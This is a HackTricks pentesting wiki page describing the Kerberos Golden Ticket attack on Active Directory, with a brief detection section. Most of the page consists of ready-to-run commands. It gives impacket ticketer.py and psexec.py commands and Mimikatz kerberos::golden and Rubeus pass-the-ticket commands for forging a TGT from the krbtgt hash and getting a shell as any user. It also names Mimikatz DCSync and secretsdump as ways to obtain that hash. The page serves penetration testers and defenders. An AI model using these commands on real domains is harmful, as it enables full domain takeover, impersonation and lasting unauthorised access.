HackTricks
Search…
Pentesting
Powered By GitBook
Golden Ticket

Golden ticket

A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain and the impersonated user.
The krbtgt account NTLM hash can be obtained from the lsass process or from the NTDS.dit file of any DC in the domain. It is also possible to get that NTLM through a DCsync attack, which can be performed either with the lsadump::dcsync module of Mimikatz or the impacket example secretsdump.py. Usually, domain admin privileges or similar are required, no matter what technique is used.
From Linux
1
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
2
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
3
python psexec.py jurassic.park/[email protected] -k -no-pass
Copied!
From Windows
1
mimikatz # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
2
.\Rubeus.exe ptt /ticket:ticket.kirbi
3
klist #List tickets in memory
Copied!
Once you have the golden Ticket injected, you can access the shared files (C$), and execute services and WMI, so you could use psexec or wmiexec to obtain a shell (looks like yo can not get a shell via winrm).

Mitigation

Golden ticket events ID:
    4624: Account Logon
    4672: Admin Logon
    Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property
Last modified 1yr ago
Copy link